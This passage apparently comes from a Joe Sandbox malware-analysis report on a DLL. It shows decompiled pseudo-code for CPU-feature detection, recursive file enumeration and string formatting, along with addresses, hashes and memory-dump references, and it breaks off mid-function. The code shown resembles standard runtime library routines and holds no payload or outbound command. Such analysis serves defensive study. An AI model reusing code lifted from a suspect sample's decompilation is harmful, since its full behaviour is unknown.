              • Opcode ID: c251f4b0195f6abe2ac1d4a2b4aeb0004e924affff5c506a291d8e2d65b0e8b6
              • Instruction ID: c4012bfdf8e6090d4576bb29aade49e51aa9eeb0a0ce806a88d2b9902ccf12dc
              • Opcode Fuzzy Hash: c251f4b0195f6abe2ac1d4a2b4aeb0004e924affff5c506a291d8e2d65b0e8b6
              • Instruction Fuzzy Hash: 0CB14B36624609CFD705CF28C486B757BE0FF45365F298658E8A9CF2A5C336E982CB40
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA89CE5 Relevance: 1.6, APIs: 1, Instructions: 144COMMON
              Download Yara Rule
              C-Code - Quality: 88%
              			E6DA89CE5(signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _t60;
				signed int _t61;
				signed int _t62;
				signed int _t63;
				signed int _t66;
				signed int _t67;
				signed int _t73;
				intOrPtr _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				signed int _t78;
				intOrPtr* _t82;
				signed int _t85;
				signed int _t90;
				intOrPtr* _t93;
				signed int _t96;
				signed int _t99;
				signed int _t104;

				_t90 = __edx;
				 *0x6dad51ac =  *0x6dad51ac & 0x00000000;
				 *0x6dab3020 =  *0x6dab3020 | 0x00000001;
				if(IsProcessorFeaturePresent(0xa) == 0) {
					L23:
					return 0;
				}
				_v20 = _v20 & 0x00000000;
				_push(_t74);
				_t93 =  &_v40;
				asm("cpuid");
				_t75 = _t74;
				 *_t93 = 0;
				 *((intOrPtr*)(_t93 + 4)) = _t74;
				 *((intOrPtr*)(_t93 + 8)) = 0;
				 *(_t93 + 0xc) = _t90;
				_v16 = _v40;
				_v12 = _v28 ^ 0x49656e69;
				_v8 = _v36 ^ 0x756e6547;
				_push(_t75);
				asm("cpuid");
				_t77 =  &_v40;
				 *_t77 = 1;
				 *((intOrPtr*)(_t77 + 4)) = _t75;
				 *((intOrPtr*)(_t77 + 8)) = 0;
				 *(_t77 + 0xc) = _t90;
				if((_v8 | _v32 ^ 0x6c65746e | _v12) != 0) {
					L9:
					_t96 =  *0x6dad51b0; // 0x2
					L10:
					_t85 = _v32;
					_t60 = 7;
					_v8 = _t85;
					if(_v16 < _t60) {
						_t78 = _v20;
					} else {
						_push(_t77);
						asm("cpuid");
						_t82 =  &_v40;
						 *_t82 = _t60;
						 *((intOrPtr*)(_t82 + 4)) = _t77;
						 *((intOrPtr*)(_t82 + 8)) = 0;
						_t85 = _v8;
						 *(_t82 + 0xc) = _t90;
						_t78 = _v36;
						if((_t78 & 0x00000200) != 0) {
							 *0x6dad51b0 = _t96 | 0x00000002;
						}
					}
					_t61 =  *0x6dab3020; // 0x6f
					_t62 = _t61 | 0x00000002;
					 *0x6dad51ac = 1;
					 *0x6dab3020 = _t62;
					if((_t85 & 0x00100000) != 0) {
						_t63 = _t62 | 0x00000004;
						 *0x6dad51ac = 2;
						 *0x6dab3020 = _t63;
						if((_t85 & 0x08000000) != 0 && (_t85 & 0x10000000) != 0) {
							asm("xgetbv");
							_v24 = _t63;
							_v20 = _t90;
							_t104 = 6;
							if((_v24 & _t104) == _t104) {
								_t66 =  *0x6dab3020; // 0x6f
								_t67 = _t66 | 0x00000008;
								 *0x6dad51ac = 3;
								 *0x6dab3020 = _t67;
								if((_t78 & 0x00000020) != 0) {
									 *0x6dad51ac = 5;
									 *0x6dab3020 = _t67 | 0x00000020;
									if((_t78 & 0xd0030000) == 0xd0030000 && (_v24 & 0x000000e0) == 0xe0) {
										 *0x6dab3020 =  *0x6dab3020 | 0x00000040;
										 *0x6dad51ac = _t104;
									}
								}
							}
						}
					}
					goto L23;
				}
				_t73 = _v40 & 0x0fff3ff0;
				if(_t73 == 0x106c0 || _t73 == 0x20660 || _t73 == 0x20670 || _t73 == 0x30650 || _t73 == 0x30660 || _t73 == 0x30670) {
					_t99 =  *0x6dad51b0; // 0x2
					_t96 = _t99 | 0x00000001;
					 *0x6dad51b0 = _t96;
					goto L10;
				} else {
					goto L9;
				}
			}






























              0x6da89ce5
              0x6da89ce8
              0x6da89cf2
              0x6da89d03
              0x6da89eb2
              0x6da89eb5
              0x6da89eb5
              0x6da89d09
              0x6da89d0f
              0x6da89d14
              0x6da89d18
              0x6da89d1c
              0x6da89d1d
              0x6da89d1f
              0x6da89d22
              0x6da89d27
              0x6da89d30
              0x6da89d41
              0x6da89d4c
              0x6da89d52
              0x6da89d53
              0x6da89d58
              0x6da89d5b
              0x6da89d60
              0x6da89d68
              0x6da89d6b
              0x6da89d6e
              0x6da89db3
              0x6da89db3
              0x6da89db9
              0x6da89db9
              0x6da89dbe
              0x6da89dbf
              0x6da89dc5
              0x6da89df6
              0x6da89dc7
              0x6da89dc9
              0x6da89dca
              0x6da89dcf
              0x6da89dd2
              0x6da89dd4
              0x6da89dd7
              0x6da89dda
              0x6da89ddd
              0x6da89de0
              0x6da89de9
              0x6da89dee
              0x6da89dee
              0x6da89de9
              0x6da89df9
              0x6da89dfe
              0x6da89e01
              0x6da89e0b
              0x6da89e16
              0x6da89e1c
              0x6da89e1f
              0x6da89e29
              0x6da89e34
              0x6da89e40
              0x6da89e43
              0x6da89e46
              0x6da89e51
              0x6da89e56
              0x6da89e58
              0x6da89e5d
              0x6da89e60
              0x6da89e6a
              0x6da89e72
              0x6da89e77
              0x6da89e81
              0x6da89e8f
              0x6da89ea2
              0x6da89ea9
              0x6da89ea9
              0x6da89e8f
              0x6da89e72
              0x6da89e56
              0x6da89e34
              0x00000000
              0x6da89eb1
              0x6da89d73
              0x6da89d7d
              0x6da89da2
              0x6da89da8
              0x6da89dab
              0x00000000
              0x00000000
              0x00000000
              0x00000000

              APIs
              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6DA89CFB
              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID: FeaturePresentProcessor
              • String ID:
              • API String ID: 2325560087-0
              • Opcode ID: ed34ab8c204651c5904ef67a2168b0efc0497880f2b787d5a1565a1c8d0b5b15
              • Instruction ID: bdba830c7c306c25d3c3a0419b878a88e805865221f2284e243e96fb18e82934
              • Opcode Fuzzy Hash: ed34ab8c204651c5904ef67a2168b0efc0497880f2b787d5a1565a1c8d0b5b15
              • Instruction Fuzzy Hash: D9515AB6A083068FEB05CF55C9817AABBF0FB4A314F14C42AE855EB291D3759A42CF54
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA994B5 Relevance: 1.6, APIs: 1, Instructions: 140COMMON
              Download Yara Rule
              C-Code - Quality: 78%
              			E6DA994B5(void* __ecx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v28;
				intOrPtr* _v32;
				intOrPtr _v36;
				signed int _v48;
				struct _WIN32_FIND_DATAW _v604;
				char _v605;
				void* _v612;
				signed int _v616;
				union _FINDEX_INFO_LEVELS _v620;
				union _FINDEX_INFO_LEVELS _v624;
				signed int _v628;
				union _FINDEX_INFO_LEVELS _v632;
				char _v636;
				signed int _v640;
				union _FINDEX_INFO_LEVELS _v644;
				union _FINDEX_INFO_LEVELS _v648;
				signed int _v652;
				union _FINDEX_INFO_LEVELS _v656;
				char _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t72;
				signed int _t77;
				signed int _t79;
				char _t81;
				signed char _t82;
				signed int _t88;
				signed int _t94;
				signed int _t100;
				signed int _t103;
				signed int _t104;
				signed int _t106;
				intOrPtr* _t112;
				signed int _t115;
				intOrPtr _t125;
				signed int _t127;
				signed int _t130;
				signed int _t132;
				void* _t135;
				void* _t137;
				intOrPtr _t139;
				intOrPtr* _t142;
				signed int _t144;
				void* _t146;
				intOrPtr* _t147;
				signed int _t156;
				void* _t164;
				signed int _t167;
				intOrPtr _t169;
				void* _t170;
				void* _t173;
				void* _t174;
				void* _t175;
				signed int _t176;
				signed int _t177;
				signed int _t180;
				void* _t181;
				signed int _t182;
				void* _t183;
				void* _t184;

				_push(__ecx);
				_t142 = _a4;
				_t2 = _t142 + 1; // 0x1
				_t164 = _t2;
				do {
					_t72 =  *_t142;
					_t142 = _t142 + 1;
				} while (_t72 != 0);
				_t167 = _a12;
				_t144 = _t142 - _t164 + 1;
				_v8 = _t144;
				if(_t144 <=  !_t167) {
					_t5 = _t167 + 1; // 0x1
					_t135 = _t5 + _t144;
					_t174 = E6DA9479A(_t135, 1);
					_t146 = _t173;
					__eflags = _t167;
					if(_t167 == 0) {
						L7:
						_push(_v8);
						_t135 = _t135 - _t167;
						_t77 = E6DA9EA98(_t146, _t174 + _t167, _t135, _a4);
						_t182 = _t181 + 0x10;
						__eflags = _t77;
						if(_t77 != 0) {
							goto L12;
						} else {
							_t139 = _a16;
							_t127 = E6DA99850(_t139);
							_v8 = _t127;
							__eflags = _t127;
							if(_t127 == 0) {
								 *( *(_t139 + 4)) = _t174;
								_t177 = 0;
								_t14 = _t139 + 4;
								 *_t14 =  *(_t139 + 4) + 4;
								__eflags =  *_t14;
							} else {
								E6DA94760(_t174);
								_t177 = _v8;
							}
							E6DA94760(0);
							_t130 = _t177;
							goto L4;
						}
					} else {
						_push(_t167);
						_t132 = E6DA9EA98(_t146, _t174, _t135, _a8);
						_t182 = _t181 + 0x10;
						__eflags = _t132;
						if(_t132 != 0) {
							L12:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E6DA8DAEC();
							asm("int3");
							_t180 = _t182;
							_t183 = _t182 - 0x298;
							_t79 =  *0x6dab3014; // 0x6c4e8ceb
							_v48 = _t79 ^ _t180;
							_t147 = _v32;
							_t165 = _v28;
							_push(_t135);
							_push(0);
							_t169 = _v36;
							_v648 = _t165;
							__eflags = _t147 - _t169;
							if(_t147 != _t169) {
								while(1) {
									_t125 =  *_t147;
									__eflags = _t125 - 0x2f;
									if(_t125 == 0x2f) {
										break;
									}
									__eflags = _t125 - 0x5c;
									if(_t125 != 0x5c) {
										__eflags = _t125 - 0x3a;
										if(_t125 != 0x3a) {
											_t147 = E6DA9F970(_t169, _t147);
											__eflags = _t147 - _t169;
											if(_t147 != _t169) {
												continue;
											}
										}
									}
									break;
								}
								_t165 = _v612;
							}
							_t81 =  *_t147;
							_v605 = _t81;
							__eflags = _t81 - 0x3a;
							if(_t81 != 0x3a) {
								L23:
								__eflags = _t81 - 0x2f;
								if(__eflags == 0) {
									L26:
									_t82 = 1;
								} else {
									__eflags = _t81 - 0x5c;
									if(__eflags == 0) {
										goto L26;
									} else {
										__eflags = _t81 - 0x3a;
										_t82 = 0;
										if(__eflags == 0) {
											goto L26;
										}
									}
								}
								_v660 = 0;
								_v656 = 0;
								_push(_t174);
								asm("sbb eax, eax");
								_v652 = 0;
								_v648 = 0;
								_v664 =  ~(_t82 & 0x000000ff) & _t147 - _t169 + 0x00000001;
								_v644 = 0;
								_v640 = 0;
								_t88 = E6DA90DCD(_t147 - _t169 + 1, _t169,  &_v660, E6DA991EA(_t165, __eflags));
								_t184 = _t183 + 0xc;
								asm("sbb eax, eax");
								_t175 = FindFirstFileExW( !( ~_t88) & _v652, 0,  &_v604, 0, 0, 0);
								__eflags = _t175 - 0xffffffff;
								if(_t175 != 0xffffffff) {
									_t151 = _v612;
									_t94 =  *((intOrPtr*)(_v612 + 4)) -  *_v612;
									__eflags = _t94;
									_v668 = _t94 >> 2;
									do {
										_v636 = 0;
										_v632 = 0;
										_v628 = 0;
										_v624 = 0;
										_v620 = 0;
										_v616 = 0;
										_t100 = E6DA99272( &(_v604.cFileName),  &_v636,  &_v605, E6DA991EA(_t165, __eflags));
										_t184 = _t184 + 0x10;
										asm("sbb eax, eax");
										_t103 =  !( ~_t100) & _v628;
										__eflags =  *_t103 - 0x2e;
										if( *_t103 != 0x2e) {
											L36:
											_push(_v612);
											_t104 = E6DA994B5(_t151, _t103, _t169, _v664);
											_t184 = _t184 + 0x10;
											_v672 = _t104;
											__eflags = _t104;
											if(_t104 != 0) {
												__eflags = _v616;
												if(_v616 != 0) {
													E6DA94760(_v628);
												}
												FindClose(_t175);
												__eflags = _v640;
												if(_v640 != 0) {
													E6DA94760(_v652);
												}
												_t106 = _v672;
											} else {
												goto L37;
											}
										} else {
											_t151 =  *((intOrPtr*)(_t103 + 1));
											__eflags = _t151;
											if(_t151 == 0) {
												goto L37;
											} else {
												__eflags = _t151 - 0x2e;
												if(_t151 != 0x2e) {
													goto L36;
												} else {
													__eflags =  *(_t103 + 2);
													if( *(_t103 + 2) == 0) {
														goto L37;
													} else {
														goto L36;
													}
												}
											}
										}
										goto L50;
										L37:
										__eflags = _v616;
										if(_v616 != 0) {
											E6DA94760(_v628);
											_pop(_t151);
										}
										__eflags = FindNextFileW(_t175,  &_v604);
									} while (__eflags != 0);
									_t112 = _v612;
									_t156 = _v668;
									_t165 =  *_t112;
									_t115 =  *((intOrPtr*)(_t112 + 4)) -  *_t112 >> 2;
									__eflags = _t156 - _t115;
									if(_t156 != _t115) {
										__eflags = _t115 - _t156;
										E6DA9F440(_t165, _t165 + _t156 * 4, _t115 - _t156, 4, E6DA9925A);
									}
									FindClose(_t175);
									__eflags = _v640;
									if(_v640 != 0) {
										E6DA94760(_v652);
									}
									_t106 = 0;
								} else {
									_push(_v612);
									_t176 = E6DA994B5( &_v604, _t169, 0, 0);
									__eflags = _v640;
									if(_v640 != 0) {
										E6DA94760(_v652);
									}
									_t106 = _t176;
								}
								L50:
								_pop(_t174);
							} else {
								__eflags = _t147 - _t169 + 1;
								if(_t147 == _t169 + 1) {
									_t81 = _v605;
									goto L23;
								} else {
									_push(_t165);
									_t106 = E6DA994B5(_t147, _t169, 0, 0);
								}
							}
							_pop(_t170);
							__eflags = _v12 ^ _t180;
							_pop(_t137);
							return E6DA89B91(_t106, _t137, _v12 ^ _t180, _t165, _t170, _t174);
						} else {
							goto L7;
						}
					}
				} else {
					_t130 = 0xc;
					L4:
					return _t130;
				}
			}





































































              0x6da994ba
              0x6da994bb
              0x6da994be
              0x6da994be
              0x6da994c1
              0x6da994c1
              0x6da994c3
              0x6da994c4
              0x6da994c9
              0x6da994d0
              0x6da994d3
              0x6da994d8
              0x6da994e2
              0x6da994e5
              0x6da994ef
              0x6da994f2
              0x6da994f3
              0x6da994f5
              0x6da99509
              0x6da99509
              0x6da9950c
              0x6da99516
              0x6da9951b
              0x6da9951e
              0x6da99520
              0x00000000
              0x6da99522
              0x6da99522
              0x6da99527
              0x6da9952e
              0x6da99531
              0x6da99533
              0x6da99544
              0x6da99546
              0x6da99548
              0x6da99548
              0x6da99548
              0x6da99535
              0x6da99536
              0x6da9953b
              0x6da9953e
              0x6da9954d
              0x6da99553
              0x00000000
              0x6da99556
              0x6da994f7
              0x6da994f7
              0x6da994fd
              0x6da99502
              0x6da99505
              0x6da99507
              0x6da99559
              0x6da9955b
              0x6da9955c
              0x6da9955d
              0x6da9955e
              0x6da9955f
              0x6da99560
              0x6da99565
              0x6da99569
              0x6da9956b
              0x6da99571
              0x6da99578
              0x6da9957b
              0x6da9957e
              0x6da99581
              0x6da99582
              0x6da99583
              0x6da99586
              0x6da9958c
              0x6da9958e
              0x6da99590
              0x6da99590
              0x6da99592
              0x6da99594
              0x00000000
              0x00000000
              0x6da99596
              0x6da99598
              0x6da9959a
              0x6da9959c
              0x6da995a7
              0x6da995a9
              0x6da995ab
              0x00000000
              0x00000000
              0x6da995ab
              0x6da9959c
              0x00000000
              0x6da99598
              0x6da995ad
              0x6da995ad
              0x6da995b3
              0x6da995b5
              0x6da995bb
              0x6da995bd
              0x6da995df
              0x6da995e1
              0x6da995e3
              0x6da995ef
              0x6da995ef
              0x6da995e5
              0x6da995e5
              0x6da995e7
              0x00000000
              0x6da995e9
              0x6da995e9
              0x6da995eb
              0x6da995ed
              0x00000000
              0x00000000
              0x6da995ed
              0x6da995e7
              0x6da995f7
              0x6da995ff
              0x6da99605
              0x6da99606
              0x6da99608
              0x6da99610
              0x6da99616
              0x6da9961c
              0x6da99622
              0x6da99636
              0x6da9963b
              0x6da99646
              0x6da9965c
              0x6da9965e
              0x6da99661
              0x6da99691
              0x6da9969a
              0x6da9969a
              0x6da9969f
              0x6da996a5
              0x6da996a5
              0x6da996ab
              0x6da996b1
              0x6da996b7
              0x6da996bd
              0x6da996c3
              0x6da996e4
              0x6da996e9
              0x6da996ee
              0x6da996f2
              0x6da996f8
              0x6da996fb
              0x6da9970e
              0x6da9970e
              0x6da9971c
              0x6da99721
              0x6da99724
              0x6da9972a
              0x6da9972c
              0x6da997a7
              0x6da997ad
              0x6da997b5
              0x6da997ba
              0x6da997bc
              0x6da997c2
              0x6da997c8
              0x6da997d0
              0x6da997d5
              0x6da997d6
              0x00000000
              0x00000000
              0x00000000
              0x6da996fd
              0x6da996fd
              0x6da99700
              0x6da99702
              0x00000000
              0x6da99704
              0x6da99704
              0x6da99707
              0x00000000
              0x6da99709
              0x6da99709
              0x6da9970c
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x6da9970c
              0x6da99707
              0x6da99702
              0x00000000
              0x6da9972e
              0x6da9972e
              0x6da99734
              0x6da9973c
              0x6da99741
              0x6da99741
              0x6da99750
              0x6da99750
              0x6da99758
              0x6da9975e
              0x6da99764
              0x6da9976b
              0x6da9976e
              0x6da99770
              0x6da99777
              0x6da99780
              0x6da99785
              0x6da99789
              0x6da9978f
              0x6da99795
              0x6da9979d
              0x6da997a2
              0x6da997a3
              0x6da99663
              0x6da99663
              0x6da99674
              0x6da99676
              0x6da9967c
              0x6da99684
              0x6da99689
              0x6da9968a
              0x6da9968a
              0x6da997dc
              0x6da997dc
              0x6da995bf
              0x6da995c2
              0x6da995c4
              0x6da995d9
              0x00000000
              0x6da995c6
              0x6da995c6
              0x6da995cc
              0x6da995d1
              0x6da995c4
              0x6da997e0
              0x6da997e1
              0x6da997e3
              0x6da997ea
              0x00000000
              0x00000000
              0x00000000
              0x6da99507
              0x6da994da
              0x6da994dc
              0x6da994dd
              0x6da994df
              0x6da994df

              Memory Dump Source
              • Source File: 00000000.00000002.321126809.000000006DA81000.00000020.00000001.01000000.00000003.sdmp, Offset: 6DA80000, based on PE: true
              • Associated: 00000000.00000002.321118914.000000006DA80000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321283455.000000006DAA4000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321302763.000000006DAB3000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321320388.000000006DAB4000.00000008.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321422081.000000006DAD4000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.321433207.000000006DAD6000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6da80000_loaddll32.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 3953c9256b9ec1e7424870db0ebe4d3f8e743d198f2ec4f5f22afd2339a74df6
              • Instruction ID: 4311f5df3057a01f5834754fff411dba27b12e93c67e918eddefbb36389c3db4
              • Opcode Fuzzy Hash: 3953c9256b9ec1e7424870db0ebe4d3f8e743d198f2ec4f5f22afd2339a74df6
              • Instruction Fuzzy Hash: C041D3B5819219AFDF10DF68CD88AAABBF8AF45304F1442D9E41DD7200DB359E858F20
              Uniqueness

              Uniqueness Score: -1.00%

              Function 6DA8F07E Relevance: 1.6, Strings: 1, Instructions: 344COMMONCrypto
              Download Yara Rule
              C-Code - Quality: 89%
              			E6DA8F07E(signed int __ecx, signed int __edx, void* __edi) {
				signed int _v8;
				char _v16;
				signed int _v18;
				signed int _v20;
				signed int _v24;
				signed int* _v28;
				signed int _v32;
				signed int _v36;
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t115;
				char _t117;
				signed int _t118;
				void* _t119;
				signed int _t120;
				signed char _t123;
				signed int _t127;
				signed char _t132;
				signed char _t135;
				signed int* _t141;
				signed int _t145;
				signed int _t149;
				signed int _t150;
				signed int* _t156;
				signed int _t158;
				signed int _t159;
				signed int* _t160;
				signed int* _t166;
				signed char _t169;
				signed char _t171;
				signed int _t173;
				signed int _t175;
				signed int _t176;
				signed int _t179;
				signed int _t180;
				signed int* _t181;
				void* _t183;
				signed int _t187;
				unsigned int _t190;
				signed int _t192;
				signed int** _t193;
				signed short* _t194;
				signed char _t197;
				signed int _t198;
				signed int _t199;
				intOrPtr _t211;
				signed int _t214;
				void* _t215;
				signed int* _t216;
				signed int _t217;
				signed int _t218;
				signed int** _t219;
				signed int _t220;
				void* _t221;
				void* _t222;
				void* _t223;

				_t215 = __edi;
				_t208 = __edx;
				_t115 =  *0x6dab3014; // 0x6c4e8ceb
				_v8 = _t115 ^ _t220;
				_t218 = __ecx;
				_t179 = 0;
				_v32 = __ecx;
				_t183 = 0x58;
				_t117 =  *((char*)(__ecx + 0x2d));
				_t222 = _t117 - 0x64;
				if(_t222 > 0) {
					__eflags = _t117 - 0x70;
					if(__eflags > 0) {
						_t118 = _t117 - 0x73;
						__eflags = _t118;
						if(_t118 == 0) {
							L9:
							_t119 = E6DA8F790(_t218);
							L10:
							if(_t119 != 0) {
								__eflags =  *((intOrPtr*)(_t218 + 0x2c)) - _t179;
								if( *((intOrPtr*)(_t218 + 0x2c)) != _t179) {
									L104:
									_t120 = 1;
									L105:
									return E6DA89B91(_t120, _t179, _v8 ^ _t220, _t208, _t215, _t218);
								}
								_t123 =  *(_t218 + 0x1c) >> 4;
								_v20 = _t179;
								_t187 = _t179;
								_v18 = _t179;
								_v28 = _t187;
								__eflags = 1 & _t123;
								if((1 & _t123) == 0) {
									L44:
									_t211 =  *((intOrPtr*)(_t218 + 0x2d));
									__eflags = _t211 - 0x78;
									if(_t211 == 0x78) {
										L46:
										__eflags = 1;
										if(1 != 0) {
											L48:
											__eflags = _t211 - 0x61;
											if(_t211 == 0x61) {
												L50:
												_t127 = 1;
												L51:
												__eflags = _t127;
												if(_t127 != 0) {
													L53:
													 *((char*)(_t220 + _t187 - 0x10)) = 0x30;
													__eflags = _t211 - 0x58;
													if(_t211 == 0x58) {
														L56:
														0x78 = 0x58;
														L57:
														 *((char*)(_t220 + _t187 - 0xf)) = 0x78;
														_t187 = _t187 + 2;
														__eflags = _t187;
														_v28 = _t187;
														L58:
														_t208 =  *((intOrPtr*)(_t218 + 0x20)) -  *((intOrPtr*)(_t218 + 0x34)) - _t187;
														__eflags =  *(_t218 + 0x1c) & 0x0000000c;
														_push(_t215);
														_v36 = _t208;
														if(( *(_t218 + 0x1c) & 0x0000000c) != 0) {
															L70:
															_push( *((intOrPtr*)(_t218 + 8)));
															_t216 = _t218 + 0x14;
															_v28 = _t218 + 0x448;
															E6DA8F907(_t218 + 0x448,  &_v20, _t187, _t216);
															_t190 =  *(_t218 + 0x1c);
															_t132 = _t190 >> 3;
															__eflags = _t132 & 0x00000001;
															if((_t132 & 0x00000001) == 0) {
																L83:
																__eflags =  *((char*)(_t218 + 0x38));
																if( *((char*)(_t218 + 0x38)) == 0) {
																	L91:
																	_push( *((intOrPtr*)(_t218 + 8)));
																	E6DA8F907(_t218 + 0x448,  *(_t218 + 0x30),  *((intOrPtr*)(_t218 + 0x34)), _t216);
																	L92:
																	_t192 =  *_t216;
																	__eflags = _t192;
																	if(_t192 < 0) {
																		L103:
																		_pop(_t215);
																		goto L104;
																	}
																	_t135 =  *(_t218 + 0x1c) >> 2;
																	__eflags = _t135 & 0x00000001;
																	if((_t135 & 0x00000001) == 0) {
																		goto L103;
																	}
																	_t218 = _v36;
																	__eflags = _t218;
																	if(_t218 <= 0) {
																		goto L103;
																	} else {
																		goto L95;
																	}
																	while(1) {
																		L95:
																		_t208 =  *_v28;
																		__eflags =  *((intOrPtr*)(_t208 + 8)) -  *((intOrPtr*)(_t208 + 4));
																		if( *((intOrPtr*)(_t208 + 8)) !=  *((intOrPtr*)(_t208 + 4))) {
																			_t193 = _v28;
																			 *_t216 = _t192 + 1;
																			 *((intOrPtr*)(_t208 + 8)) =  *((intOrPtr*)(_t208 + 8)) + 1;
																			 *( *( *_t193)) = 0x20;
																			_t141 =  *_t193;
																			 *_t141 =  *_t141 + 1;
																			__eflags =  *_t141;
																			_t192 =  *_t216;
																		} else {
																			__eflags =  *((char*)(_t208 + 0xc));
																			if( *((char*)(_t208 + 0xc)) == 0) {
																				_t192 = _t192 | 0xffffffff;
																				__eflags = _t192;
																			} else {
																				_t192 = _t192 + 1;
																			}
																			 *_t216 = _t192;
																		}
																		__eflags = _t192 - 0xffffffff;
																		if(_t192 == 0xffffffff) {
																			goto L103;
																		}
																		_t179 = _t179 + 1;
																		__eflags = _t179 - _t218;
																		if(_t179 < _t218) {
																			continue;
																		}
																		goto L103;
																	}
																	goto L103;
																}
																__eflags =  *((intOrPtr*)(_t218 + 0x34)) - _t179;
																if( *((intOrPtr*)(_t218 + 0x34)) <= _t179) {
																	goto L91;
																}
																_t194 =  *(_t218 + 0x30);
																_v20 = _t179;
																while(1) {
																	_v24 = _t179;
																	_v32 =  &(_t194[1]);
																	_t145 = E6DA95341(_t208,  &_v24,  &_v16, 6,  *_t194 & 0x0000ffff,  *((intOrPtr*)(_t218 + 8)));
																	_t221 = _t221 + 0x14;
																	__eflags = _t145;
																	if(_t145 != 0) {
																		break;
																	}
																	__eflags = _v24 - _t145;
																	if(_v24 == _t145) {
																		break;
																	}
																	_push( *((intOrPtr*)(_t218 + 8)));
																	E6DA8F907(_t218 + 0x448,  &_v16, _v24, _t216);
																	_t194 = _v32;
																	_t149 = _v20 + 1;
																	_v20 = _t149;
																	__eflags = _t149 -  *((intOrPtr*)(_t218 + 0x34));
																	if(_t149 !=  *((intOrPtr*)(_t218 + 0x34))) {
																		continue;
																	}
																	goto L92;
																}
																 *_t216 =  *_t216 | 0xffffffff;
																goto L92;
															}
															_t197 = _t190 >> 2;
															__eflags = _t197 & 0x00000001;
															if((_t197 & 0x00000001) != 0) {
																goto L83;
															}
															_t198 = _v36;
															_v20 = _t179;
															__eflags = _t198;
															if(_t198 <= 0) {
																goto L83;
															}
															_t214 =  *_t216;
															_t219 = _v28;
															while(1) {
																_t150 =  *_t219;
																_v24 = _t150;
																_t180 = _t150;
																__eflags =  *((intOrPtr*)(_t150 + 8)) -  *((intOrPtr*)(_t180 + 4));
																if( *((intOrPtr*)(_t150 + 8)) !=  *((intOrPtr*)(_t180 + 4))) {
																	 *_t216 = _t214 + 1;
																	 *((intOrPtr*)(_t180 + 8)) =  *((intOrPtr*)(_t180 + 8)) + 1;
																	 *( *( *_t219)) = 0x30;
																	_t156 =  *_t219;
																	 *_t156 =  *_t156 + 1;
																	__eflags =  *_t156;
																	_t208 =  *_t216;
																} else {
																	_t159 = _t180;
																	__eflags =  *((char*)(_t159 + 0xc));
																	if( *((char*)(_t159 + 0xc)) == 0) {
																		_t208 = _t208 | 0xffffffff;
																		__eflags = _t208;
																	} else {
																		_t208 = _t208 + 1;
																	}
																	 *_t216 = _t208;
																}
																__eflags = _t208 - 0xffffffff;
																if(_t208 == 0xffffffff) {
																	break;
																}
																_t158 = _v20 + 1;
																_v20 = _t158;
																__eflags = _t158 - _t198;
																if(_t158 < _t198) {
																	continue;
																}
																break;
															}
															_t218 = _v32;
															_t179 = 0;
															__eflags = 0;
															goto L83;
														}
														__eflags = _t208;
														if(_t208 <= 0) {
															goto L70;
														}
														_t217 =  *(_t218 + 0x14);
														_t199 = _t179;
														while(1) {
															_t160 =  *(_t218 + 0x448);
															_t181 =  *(_t218 + 0x448);
															__eflags = _t160[2] - _t181[1];
															if(_t160[2] != _t181[1]) {
																 *(_t218 + 0x14) = _t217 + 1;
																_t181[2] = _t181[2] + 1;
																 *( *( *(_t218 + 0x448))) = 0x20;
																_t166 =  *(_t218 + 0x448);
																 *_t166 =  *_t166 + 1;
																__eflags =  *_t166;
																_t217 =  *(_t218 + 0x14);
															} else {
																__eflags = _t181[3];
																if(_t181[3] == 0) {
																	_t217 = _t217 | 0xffffffff;
																	__eflags = _t217;
																} else {
																	_t217 = _t217 + 1;
																}
																 *(_t218 + 0x14) = _t217;
															}
															__eflags = _t217 - 0xffffffff;
															if(_t217 == 0xffffffff) {
																break;
															}
															_t199 = _t199 + 1;
															__eflags = _t199 - _t208;
															if(_t199 < _t208) {
																continue;
															}
															break;
														}
														_t187 = _v28;
														_t179 = 0;
														__eflags = 0;
														goto L70;
													}
													__eflags = _t211 - 0x41;
													if(_t211 == 0x41) {
														goto L56;
													}
													goto L57;
												}
												__eflags = _t127;
												if(_t127 == 0) {
													goto L58;
												}
												goto L53;
											}
											_t127 = _t179;
											__eflags = _t211 - 0x41;
											if(_t211 != 0x41) {
												goto L51;
											}
											goto L50;
										}
										L47:
										goto L48;
									}
